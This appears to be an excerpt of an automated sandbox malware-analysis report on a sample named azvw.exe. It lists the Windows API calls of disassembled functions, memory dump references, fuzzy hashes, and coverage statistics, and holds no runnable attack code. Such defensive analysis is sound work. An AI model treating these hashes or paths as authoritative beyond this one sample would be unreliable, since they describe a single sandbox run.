                                        • WideCharToMultiByte.KERNEL32(0041C6AA,00000220,7591DF80,00000000,00000000,00000000,00000000,00000000,7591DF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,7591DF80), ref: 0041A7B0
                                        • WideCharToMultiByte.KERNEL32(?,00000220,?,?,00000000,00000000,00000000,00000000), ref: 0041A819
                                        • GetStringTypeA.KERNEL32(?,00000100,?,?), ref: 0041A884
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: StringType$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 3852931651-0
                                        • Opcode ID: a43e38c5c5d028c144d3e8cb6c32465874376830a1d5fb65c484278b2941d380
                                        • Instruction ID: 234dd49fbe87c6ca2bccb5c469feb3bcb330d3ea89130add922d392c3e6857ad
                                        • Opcode Fuzzy Hash: a43e38c5c5d028c144d3e8cb6c32465874376830a1d5fb65c484278b2941d380
                                        • Instruction Fuzzy Hash: 2051D371941219EBCF219F95CC46EEFBF74FF49710F10851AF514A2290D33899A2CBAA
                                        APIs
                                        • GetStringTypeW.KERNEL32(00000001,004231C4,00000001,?,00000103,00000001,?,0041B122,00200020,00000000,?,?,00000000,00000001), ref: 004188E5
                                        • GetStringTypeA.KERNEL32(00000000,00000001,004231C0,00000001,?,?,?,00000000,00000001), ref: 004188FF
                                        • GetStringTypeA.KERNEL32(?,?,?,00000000,00200020,00000103,00000001,?,0041B122,00200020,00000000,?,?,00000000,00000001), ref: 00418933
                                        • MultiByteToWideChar.KERNEL32(0041B122,00000002,?,00000000,00000000,00000000,00000103,00000001,?,0041B122,00200020,00000000,?,?,00000000,00000001), ref: 0041896B
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 004189C1
                                        • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 004189D3
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: StringType$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 3852931651-0
                                        • Opcode ID: b6fc29cc1fe91b7363b8991f027c7948fc37d024faef256876d7a34b7c7ad979
                                        • Instruction ID: 45773244ba3084bfe591248ee5288dd1411f43dfdcda665af45e3c3989b1d248
                                        • Opcode Fuzzy Hash: b6fc29cc1fe91b7363b8991f027c7948fc37d024faef256876d7a34b7c7ad979
                                        • Instruction Fuzzy Hash: BA417BB2600219AFCF208F95DC86AEF7B79FB08750F10492AF911D2250C77989918B9A
                                        APIs
                                        • GetVersionExA.KERNEL32 ref: 0041750C
                                        • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00417541
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004175A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: EnvironmentFileModuleNameVariableVersion
                                        • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                        • API String ID: 1385375860-4131005785
                                        • Opcode ID: 3eaa5e944d136b0007a8d9a645e7be42f59fb39eb476563cdd890dddd771b81e
                                        • Instruction ID: 85bddbf609848ad88969b96e0ec2a342a30041935dc8ecfc60b45b29f21cca6b
                                        • Opcode Fuzzy Hash: 3eaa5e944d136b0007a8d9a645e7be42f59fb39eb476563cdd890dddd771b81e
                                        • Instruction Fuzzy Hash: F4317B7184E2587DEB3186746C55BEF3B798B02354F2404DBD189C6242E63C9EC6CB1D
                                        APIs
                                        • IsValidSecurityDescriptor.ADVAPI32(?,00000000,00000000,?,00000000,0040FA5A,?,?,00000000), ref: 00412726
                                          • Part of subcall function 00412550: CreateMutexA.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00412334), ref: 00412566
                                        • GetSecurityDescriptorControl.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,7591E010), ref: 00412747
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: DescriptorSecurity$ControlCreateMutexValid
                                        • String ID:
                                        • API String ID: 5382943-0
                                        • Opcode ID: 7a40a00d7cc83c6fb11208a9676cb8a6778e7d7d4183abda0f0fc39d63e3b559
                                        • Instruction ID: ce17b90b339484897982068a113a1875571977018ad8679ec67858a3e104fd9b
                                        • Opcode Fuzzy Hash: 7a40a00d7cc83c6fb11208a9676cb8a6778e7d7d4183abda0f0fc39d63e3b559
                                        • Instruction Fuzzy Hash: 434116363043014BE720DF69EE84BE7B7D4EBC0764F54082EED64C7390D6B9E85986A5
                                        APIs
                                        • VirtualFree.KERNEL32(000000FF,00000000,00008000,hB,0041841D,hB,7591DFF0,?,00000000,?,?,004184CF,00000010,00413378,?,?), ref: 0041832C
                                        • HeapFree.KERNEL32(00000000,?,?,004184CF,00000010,00413378,?,?), ref: 00418362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: Free$HeapVirtual
                                        • String ID: hB$hB$hB
                                        • API String ID: 3783212868-3407773006
                                        • Opcode ID: ac2766d890ba760c26cec665f9c93e8237cd86e774a741f4bb10f7a7867d9e1f
                                        • Instruction ID: f7fd38735fced4e952862f77377cc11919846e26e52132b364c2a56e16ac4255
                                        • Opcode Fuzzy Hash: ac2766d890ba760c26cec665f9c93e8237cd86e774a741f4bb10f7a7867d9e1f
                                        • Instruction Fuzzy Hash: 3DF03A74601310DFC3249F18EC84B967BF0FB08B10B21842DE5A5573A0C771AC81CB48
                                        APIs
                                        • SetConsoleCtrlHandler.KERNEL32(00412B44,00000001,?,?,?,0040103D,00000002,004076E0,00000002,00428D60,?,?,?,?,?,00401014), ref: 00412AC8
                                        • GetLastError.KERNEL32(?,?,?,0040103D,00000002,004076E0,00000002,00428D60,?,?,?,?,?,00401014,?,?), ref: 00412AF7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: ConsoleCtrlErrorHandlerLast
                                        • String ID: v@$v@
                                        • API String ID: 3113525192-2252294108
                                        • Opcode ID: be862bb647b63607e7147e6a5487d70ccdf36829498479ed286d36be58b49362
                                        • Instruction ID: 36fa8ff7c152ed876fc65d5f67174a495ff5afcdeb0d815e8b9c8bd107a64320
                                        • Opcode Fuzzy Hash: be862bb647b63607e7147e6a5487d70ccdf36829498479ed286d36be58b49362
                                        • Instruction Fuzzy Hash: EE219131A155108B8A398F08DA885EAB762ABA1350799422BC805C73B0D6F86CE6C78D
                                        APIs
                                        • GetVersion.KERNEL32 ref: 0041489E
                                          • Part of subcall function 00417635: HeapCreate.KERNELBASE(00000000,00001000,00000000,004148D6,00000000), ref: 00417646
                                          • Part of subcall function 00417635: HeapDestroy.KERNEL32 ref: 00417685
                                        • GetCommandLineA.KERNEL32 ref: 004148EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: Heap$CommandCreateDestroyLineVersion
                                        • String ID: 0?m$p?W
                                        • API String ID: 380418793-2012332794
                                        • Opcode ID: 53cb6a2e33b43d3e746f44d824cede3df95076df898fab41908b02af978c95f0
                                        • Instruction ID: 610b4beb7cdddbb7dcae773a6b473d71e334a56a1981e3a69ac621e6592c7341
                                        • Opcode Fuzzy Hash: 53cb6a2e33b43d3e746f44d824cede3df95076df898fab41908b02af978c95f0
                                        • Instruction Fuzzy Hash: 6201C0B1A11601ABD718AF6ADC067AE7AB8FB68344F80413FF914822E1DF3808418B5D
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 427a3472328d7d1c61610fd7d40306d59065ffd795d00f0f890eeb67c1721805
                                        • Instruction ID: 459714ddabeffe01b96583aa82163a16ed5fdc408948e7cab0404e7047e2aba0
                                        • Opcode Fuzzy Hash: 427a3472328d7d1c61610fd7d40306d59065ffd795d00f0f890eeb67c1721805
                                        • Instruction Fuzzy Hash: F57116365002106BDB226A65CC40BEF3A25EBD27A8F250127FC289A2D0DB3DDDC1969C
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0041C6AA,00000000,00000000,7591DF80,00000000), ref: 0041CF0C
                                        • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041CF66
                                        • WideCharToMultiByte.KERNEL32(?,00000220,?,?,00000000,00000000,00000000,00000000), ref: 0041CF7E
                                        • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041CFD6
                                        • CompareStringA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 0041CFF4
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$CompareString
                                        • String ID:
                                        • API String ID: 376665442-0
                                        • Opcode ID: dbaede760fa393ef53ab3c1242556b367d8345edddc8a848cdddf23556fa72f6
                                        • Instruction ID: 9864fccd20358ca3471ff816892f761ab08e69d42232d9cc94e5ed20e2ccf262
                                        • Opcode Fuzzy Hash: dbaede760fa393ef53ab3c1242556b367d8345edddc8a848cdddf23556fa72f6
                                        • Instruction Fuzzy Hash: A821D572900259EBCF228F96CC85DDFBF76FF89750F24811AF91061260D33A8961EB64
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000002,00000002,00000002,?,00000002,00428D60,0040114F), ref: 0041AD02
                                        • MultiByteToWideChar.KERNEL32(?,00000009,00428D60,00000002,00000000,00000000,?,00000002,00428D60,0040114F), ref: 0041AD15
                                        • MultiByteToWideChar.KERNEL32(?,00000001,00428D60,00000002,?,00000000,?,00000002,00428D60,0040114F), ref: 0041AD61
                                        • CompareStringW.KERNEL32(?,?,00000000,00000002,?,00000000,?,00000000,?,00000002,00428D60,0040114F), ref: 0041AD79
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$CompareString
                                        • String ID:
                                        • API String ID: 376665442-0
                                        • Opcode ID: 2702ab6cdf56d2763e6d62c6ecf4a2ed95136fa1c4226cc5a579848ba68c566b
                                        • Instruction ID: 96f580f69b9e3dcf2c1ef1fcae33e3ea1998bfe1201ed0f81b595f9675030ecf
                                        • Opcode Fuzzy Hash: 2702ab6cdf56d2763e6d62c6ecf4a2ed95136fa1c4226cc5a579848ba68c566b
                                        • Instruction Fuzzy Hash: DD212932D01659EBCF218FD5DC459DEBFB6FF48360F10412AFA10622A0C3369962DB96
                                        APIs
                                        • GetCPInfo.KERNEL32(?,00000000), ref: 00415485
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: Info
                                        • String ID: $
                                        • API String ID: 1807457897-3032137957
                                        • Opcode ID: 206481e3e4300311258317caa61d1883e1de100da41eb334363ef2002a580eda
                                        • Instruction ID: 0d18aeb077521f4644a221a408f67d066500747ada27a7292fb7ec63da0fa870
                                        • Opcode Fuzzy Hash: 206481e3e4300311258317caa61d1883e1de100da41eb334363ef2002a580eda
                                        • Instruction Fuzzy Hash: 0D419C31144698AFEB258B14CD49BFB3FABEB45704F1410E6D189C7252C23D49D8CBAB
                                        APIs
                                        • DosDateTimeToFileTime.KERNEL32(4F020EB0,4F020EB0,?), ref: 0040FC80
                                        • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,0040F775,?,?,?), ref: 0040FC90
                                          • Part of subcall function 0040FCE0: SystemTimeToFileTime.KERNEL32(?,?,00000000,?,?,0040FC29,?,?,00000001), ref: 0040FD9F
                                          • Part of subcall function 0040FCE0: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,0040FC29,?,?,00000001), ref: 0040FDAF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: Time$File$Local$DateSystem
                                        • String ID: nircmdc.exe
                                        • API String ID: 906138043-3082794360
                                        • Opcode ID: ac9c37c9d280e7aeeecda865d65c29ca38083135dfc648224f3fac08bf768192
                                        • Instruction ID: 5baf95fb76d08c68963974afa87817b976a97d3decfcf36862cfafa69845cedb
                                        • Opcode Fuzzy Hash: ac9c37c9d280e7aeeecda865d65c29ca38083135dfc648224f3fac08bf768192
                                        • Instruction Fuzzy Hash: 353184B99583045BE224DB14DC46A6773E8FB88704F04493DFD4467391D279ED09CBAA
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe,00000104,?,?,?,?,?,?,00414906), ref: 00419E28
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: FileModuleName
                                        • String ID: 0?m$C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                        • API String ID: 514040917-3258136295
                                        • Opcode ID: 69411218f1c94a6dd42d14112d01cc6fa211bfa7316ed4987b16ed9e76e8abc8
                                        • Instruction ID: 7408305981f393a2461c7ea777b88d73264b4f52652a7915fef0a583e634ad3b
                                        • Opcode Fuzzy Hash: 69411218f1c94a6dd42d14112d01cc6fa211bfa7316ed4987b16ed9e76e8abc8
                                        • Instruction Fuzzy Hash: 9C118FB2900218BFDB11EB95CC81CDF77ACEA44358B0000AFF50193241EA34AE458BA4
                                        APIs
                                        • CharToOemA.USER32(00000000,00000000), ref: 004026A9
                                        • OemToCharA.USER32(00000000,00000000), ref: 004026C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: Char
                                        • String ID: %@
                                        • API String ID: 751630497-2048787947
                                        • Opcode ID: 6e380c911fb415733835f5aa260d4525884f8dd25feb0fab7b4cd8439c7f1fe2
                                        • Instruction ID: b3c2b64b661b7efdf6035ac58ec0d7cccb6eb28b1d05d5fc9c221f85c97273e9
                                        • Opcode Fuzzy Hash: 6e380c911fb415733835f5aa260d4525884f8dd25feb0fab7b4cd8439c7f1fe2
                                        • Instruction Fuzzy Hash: 7201F77B50111033CA1057767D4A89B3B68EAC13727184A3AFD19973D2EABEDC0193B9
                                        APIs
                                          • Part of subcall function 0041497C: ExitProcess.KERNEL32 ref: 00414999
                                          • Part of subcall function 00418AC8: GetStartupInfoA.KERNEL32(?), ref: 00418B21
                                          • Part of subcall function 00418AC8: GetFileType.KERNEL32(00000800), ref: 00418BC7
                                        • GetCommandLineA.KERNEL32 ref: 004148EC
                                          • Part of subcall function 0041A052: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A06D
                                          • Part of subcall function 0041A052: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A0AD
                                          • Part of subcall function 0041A052: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004148FC), ref: 0041A0E5
                                          • Part of subcall function 0041A052: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004148FC), ref: 0041A107
                                          • Part of subcall function 0041A052: FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,004148FC), ref: 0041A120
                                          • Part of subcall function 00419E05: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe,00000104,?,?,?,?,?,?,00414906), ref: 00419E28
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: EnvironmentStrings$ByteCharFileMultiWide$CommandExitFreeInfoLineModuleNameProcessStartupType
                                        • String ID: 0?m$p?W
                                        • API String ID: 3035132275-2012332794
                                        • Opcode ID: 3358fd71c18e52bf8753f7553ec77d9a6f45251d019d7f0cbf8b29ef5068fb17
                                        • Instruction ID: ea6fa02a5da030dc8a813d72d8730ab7c23149c4ece309ab7dc01526205c9549
                                        • Opcode Fuzzy Hash: 3358fd71c18e52bf8753f7553ec77d9a6f45251d019d7f0cbf8b29ef5068fb17
                                        • Instruction Fuzzy Hash: E3F049B49112009FEB14BFB2E8069ED37B4FB58309B50002FF801972A1DF394880CB2D
                                        APIs
                                        • GetDriveTypeA.KERNEL32(-00000060,0041179E,-00000060,?,00000000), ref: 00411B2E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: DriveType
                                        • String ID: /$:
                                        • API String ID: 338552980-4222935259
                                        • Opcode ID: 1bab22ddc8c8ab6719041f6db9f46d6405986c177cfcddc1ce3f0d567b452f07
                                        • Instruction ID: a07ccfaa741e44cdb586d8d66076ba6bd627a13065fdecee1af11a2a6ee7f3a9
                                        • Opcode Fuzzy Hash: 1bab22ddc8c8ab6719041f6db9f46d6405986c177cfcddc1ce3f0d567b452f07
                                        • Instruction Fuzzy Hash: DAD0175520C3C1ADE3068738855839EBFD24FE6248F08C89CF0CD46197C274868AD32B
                                        APIs
                                        • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00417AFF,?,?,?,00000100), ref: 00417D5F
                                        • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00417AFF,?,?,?,00000100), ref: 00417D93
                                        • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00417AFF,?,?,?,00000100), ref: 00417DAD
                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00417AFF,?,?,?,00000100), ref: 00417DC4
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: AllocHeap$FreeVirtual
                                        • String ID:
                                        • API String ID: 3499195154-0
                                        • Opcode ID: 33001df4db496528ad52e2b10be87e81acbf967580db6c9781919396473561c5
                                        • Instruction ID: 19d746281750a9b93ecae615901eefe1d66095e7a60d7e67be2a35289f352c6c
                                        • Opcode Fuzzy Hash: 33001df4db496528ad52e2b10be87e81acbf967580db6c9781919396473561c5
                                        • Instruction Fuzzy Hash: 9811CE74240300AFC335CF19EC88AA27BB2FB98314710493DF2A2C31B0D3759966DB5A

                                        Execution Graph

                                        Execution Coverage:17.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:1526
                                        Total number of Limit Nodes:33
